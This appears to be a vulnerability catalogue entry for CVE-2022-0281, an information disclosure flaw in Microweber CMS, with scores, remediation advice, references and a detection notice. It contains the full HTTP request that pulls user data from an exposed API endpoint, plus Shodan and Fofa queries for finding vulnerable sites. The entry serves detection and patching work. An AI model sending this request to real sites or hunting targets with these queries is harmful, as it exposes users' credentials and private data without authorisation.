🔙 목록으로 돌아가기

CVE-2022-0281: Microweber Information Disclosure

TitleMicroweber Information Disclosure
Authorpikpikcu
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information.
RemediationApply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281).
CVSS Score7.5
EPSS Score0.18624
CVE IDCVE-2022-0281
CWE IDCWE-200
Shodan Queryhttp.favicon.hash:780351152http.html:"microweber"
Fofa Querybody="microweber"icon_hash=780351152
Tags cve cve2022 microweber disclosure huntr vuln

🔍 Vulnerability Description

Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.

🌐 HTTP Request

GET /api/users/search_authors HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0281.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0281.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A